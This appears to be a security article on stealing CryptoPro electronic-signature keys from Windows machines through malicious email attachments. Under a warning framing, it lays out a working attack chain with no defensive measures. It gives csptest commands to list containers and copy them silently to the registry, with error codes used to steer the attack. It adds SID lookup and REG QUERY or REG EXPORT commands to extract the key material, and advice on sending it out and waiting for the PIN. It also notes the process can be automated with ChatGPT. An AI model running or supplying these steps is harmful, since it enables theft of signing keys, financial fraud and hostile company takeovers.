Electronic signature leak: how to lose property, money, and a company

In the era of digitalization of corporate processes, electronic signatures have become an essential tool for confirming the legitimacy of documents. However, in practice, there is a real threat of compromising these signatures, especially through common channels like emails with attachments, through which more than 90% of successful attacks occur.

What can happen when an electronic signature is compromised? Possible consequences:

• Loss of funds in a bank account. Malicious actors can make illegal transfers by signing all payment documents with your electronic signature. Proving theft will be impossible since all transactions will be legitimately signed and recognized as valid.

• Loss of property. With the stolen signature, a fake contract can be created, for example, for the sale of company property, leading to significant financial losses.

• Disruption of deals. If the bank blocks the account due to suspicious transactions, you will not be able to make payments or receive money. Such incidents can stop business operations for an indefinite period, causing deals to fall through.

• Reputation damage. With a stolen signature, criminals can sign fake tender applications with unfavorable terms. This will not only lead to the cancellation of the deal and inclusion in the list of dishonest suppliers, but also result in financial losses.

• Hostile takeover of the company. By using the signature of a key employee, criminals can change the charter, appoint a new manager, or weaken the company in other ways, threatening its stability and control.

• Loss of employee property. Criminals can use the electronic signature to sign fake real estate transactions or other asset deals. If the transaction is recognized as valid, the employee may file a lawsuit against the employer, demanding compensation for the damages, which will hold the company responsible for failing to ensure information security.

The article describes a real, tested mechanism of signature compromise that can lead to serious consequences.

Threat description

Overview:

1. An employee of the organization receives an email from a supplier. The attachment can be anything—an invoice, reconciliation statement, or claim. Behind the file's facade, there could be:

   • a macro in *.docm;

   • PowerShell script, *.hta or *.vbs;

   • self-extracting archive;

   • or even *.lnk that triggers a chain of calls;

2. When the attachment is opened on the workstation, a script or executable file is launched that sequentially:

   • Collects a list of installed containers;

   • Copies the container contents into the registry;

   • Extracts key data from the registry;

3. The data is sent to a remote server, which allows gathering a complete set of cryptographic information for further use.

Technical details of the algorithm

Let's consider the implementation of the algorithm using the Windows operating system as an example, since, despite import substitution, this platform remains the most widely used for electronic document management.

The key dump is carried out in several stages. Each of them may include different mechanisms and additional measures to improve fault tolerance, but the general algorithm is approximately as follows:

Getting the container list through the CryptoPro utility

csptest -keyset -enum_cont -verifycontext –fqcn

CSP (Type:80) v5.0.10008 KC1 Release Ver:5.0.12000 OS:Windows CPU:AMD64 FastCode:READY:AVX.
AcquireContext: OK. HCRYPTPROV: 995157792
\.\FAT12_E\d58fe6c13-d917-2a53-8e9c-8c4b8158220
OK.
Total: SYS: 0,063 sec USR: 0,016 sec UTC: 0,086 sec
[ErrorCode: 0x00000000]

The output contains the paths to the containers — both local and external. Container names can be easily highlighted using regular expressions.

Substitution of values and copying containers to the registry

csptest -keycopy -contsrc "" -contdest "" –silent

CryptAcquireContext succeeded.HCRYPTPROV: 4014360096
CryptAcquireContext succeeded.HCRYPTPROV: 4014640432
Total: SYS: 0,094 sec USR: 0,094 sec UTC: 0,271 sec
[ErrorCode: 0x00000000]

The command is executed in "silent" mode, which prevents notifications, such as token insertion prompts or password entry requests, which is important for the stealthiness of the operation. Pay attention to the error code — it can be used to track the execution result and make changes to the algorithm. For example:

• code 0x8009000f — an attempt to copy a password-protected container without specifying a password;

• 0x8010006e — the user declined the password entry request;

• 0x00000000 — the operation is successful, you can move to the next stage.

Getting the user's SID

whoami /user

The SID is necessary for determining the registry path where the keys are stored. It can also be easily highlighted using regular expressions.

Extracting keys from the registry:

The keys are extracted using the REG QUERY command, and the SID and container name are substituted into the registry path.

REG QUERY "HKLM\SOFTWARE\WOW6432Node\Crypto Pro\Settings\Users\\Keys\"

name.key         REG_BINARY    30261624643538...
header.key       REG_BINARY    308205B5308203...
primary.key      REG_BINARY    308205B5308205...
masks.key        REG_BINARY    30360420CA74D3...
primary2.key     REG_BINARY    302204201675D2...
masks2.key       REG_BINARY    303604208A0E18...

The output contains the keys, which will need to be slightly transformed.

Alternatively, you can export the registry branch using REG EXPORT, in which case the data will be exported in a ready-to-use REG file, which can be read or sent in full.

REG EXPORT "HKLM\SOFTWARE\WOW6432Node\Crypto Pro\Settings\Users\\Keys\" "C:\Users\User\branch.reg"

Sending data to a remote server

Dump files can be sent over the network (HTTP, SMTP, FTP). Such traffic is easy to mask and doesn't raise suspicion.

Now it's enough to insert the obtained keys into the registry and test their availability.

Alternative vector: using digital signatures without copying

Even if the container cannot be copied (for example, it is marked as non-exportable), the attacker can use the cryptographic provider to locally sign documents and send them to a remote server. This is especially dangerous because it does not require breaking the token but compromises its owner.

PIN-code? We'll just wait

Based on the error codes, it can be determined that the container is password-protected, and the program can be switched to a waiting mode, waiting for the password input (e.g., 4–8 digits).

This is not brute-force — it's passive listening.

Which languages are used

The algorithm can be implemented in any language capable of executing commands, working with the command line, and sending HTTP requests:

Most commonly used are:

• C / C++

• PowerShell

• Python

• VBS

Conclusion

The presented mechanism is not a hypothesis, but a proven algorithm successfully tested on a laboratory stand. The threat of digital signature leakage and its remote use is real, and underestimating it can lead to serious consequences.

A signature can not only be copied, but also used without the owner's knowledge, bypassing complex exploits and deceiving security systems without the need to hire hackers from the darknet.

The algorithm described in the article is simple to implement and does not require deep technical knowledge. With modern tools such as ChatGPT, the entire process can be automated — from parsing data to converting it.